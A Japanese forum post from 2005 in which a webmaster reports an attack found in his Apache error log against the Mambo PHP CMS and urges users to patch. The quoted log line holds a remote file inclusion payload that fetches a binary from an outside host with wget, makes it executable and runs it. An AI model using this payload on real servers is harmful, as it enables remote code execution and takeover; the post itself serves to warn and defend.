ログイン
ユーザ名:

パスワード:


パスワード紛失

新規登録
Main Menu
Tweet
Facebook
Line
:-?
フラット表示 前のトピック | 次のトピック
投稿者 スレッド
webadm
投稿日時: 2005-12-24 21:18
Webmaster
登録日: 2004-11-7
居住地:
投稿: 3107
MAMBOの脆弱性を狙った攻撃
apacheのエラーログを眺めていたら見慣れないものが

[Sat Dec 24 11:14:18 2005] [error] [client 83.16.85.11] request failed: erroneous characters after pro
tocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosCo
nfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%2
0micu;./micu;echo%20YYY;echo| HTTP\\x01.1

どうやらMAMBOというPHPベースのCMSを狙った攻撃らしい。

当サイトではMAMBOは使用していないしそれまで存在すら知らなかった。調べたところ日本語化をしていたコミュニティーが存在し、最近本家のMAMBOが分裂したりして追従が困難になって活動を休止しているようだ。

この攻撃の対象となっているPHPベースのCMSに共通して存在していた脆弱性に対するパッチはすでに公開されているので古いMAMBOを使っている人は至急パッチを適用したほうがよいだろう。
フラット表示 前のトピック | 次のトピック

題名 投稿者 日時
 » MAMBOの脆弱性を狙った攻撃 webadm 2005-12-24 21:18

投稿するにはまず登録を
 
ページ変換(Google Translation)
サイト内検索